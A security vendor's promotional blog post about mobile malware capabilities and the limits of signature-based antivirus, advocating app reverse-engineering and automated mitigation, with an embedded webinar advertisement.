Hack In The Box: Mobile Malware Goes In For The Kill

For attackers, installing a Trojan on your mobile device is the best way to attack it. Mobile malware provides attackers with a full arsenal of capabilities they can use to conduct several types of attacks including surveillance, info-stealing, ransomware, fraud, and much more. Surveillance malware, for instance, can track location, extract call logs, files, and SMS messages, log keyboard activity, take screenshots, and even record video and audio using the device camera and microphone. However, for each of these features, the malware must have the right code.

Malware writers do their best to disguise incriminating code segments. Even code for legitimate apps looks like a tangled map with virtually infinite routes. App logic is complex, and it can be tough to understand if it has malicious segments. To identify these segments, mobile anti-virus uses a signature-based detection of a whole or parts of an app to determine if it can cause harm.

Webinar: How to Keep Mobile Threats at Bay

Enabling and Securing iOS and Android in the Enterprise

Securing today’s powerful mobile devices and the data on them is critical for the enterprise, but more than half of decision makers in a recent IDC survey had security and compliance issues during mobility rollouts. Join guest presenter Rob Westervelt, research manager for security products at IDC and Michael Shaulov, head of mobility at Check Point to learn why it’s more important than ever to have security for iOS and Android that provides continuous mobile protection for apps, networks, and operating systems.

> Register for Europe Session

AVs have several shortcomings that limit their ability to protect users against malware. Since they use static signatures, malware developers can bypass defenses with minor code modifications which can be done by obfuscation and encryption. Some malware writers test their malware against various AVs to make sure their code alterations can evade signature-based detection. Moreover, anti-virus solutions are unable to identify and stop new threats they have not encountered before. The ideal security solution should incorporate the following capabilities:

  • Capture and reverse-engineer apps for code-flow analysis to expose any suspicious behavior.
  • Automate responses and user notifications with remediation steps to remove the malware.
  • Dynamically trigger device policy changes in your MDM or EMM solution.
  • Block traffic to malicious servers to contain the attack.
  • Detect and mitigate unknown threats.

As opposed to AVs, advanced threat prevention solutions analyze and reverse-engineer apps to gain a better understanding of how they work. This analysis is immune to changes and obfuscation attempts since they detect the actual malicious activity rather than a certain structure within it. This allows them to detect and mitigate unknown threats, not just known code samples. This is a crucial capability, as more samples of unknown malware rapidly emerge. Advanced solutions can identify and block not only actual malicious actions but even dangerous app behaviors that can lead to data loss.

It is possible to automate mitigation actions taken by advanced threat prevention solutions to manage your mobile network security simply and effectively. By blocking communications with malicious servers during the mitigation process, users can continue to use their devices without interference. If using an MDM or EMM solution, you can also enforce policy changes throughout your mobile network to protect it both from poorly implemented apps and from outright malware.

To learn more about the major threats facing
mobile devices in the enterprise, read our

CISO’s Guide to Mobile Security.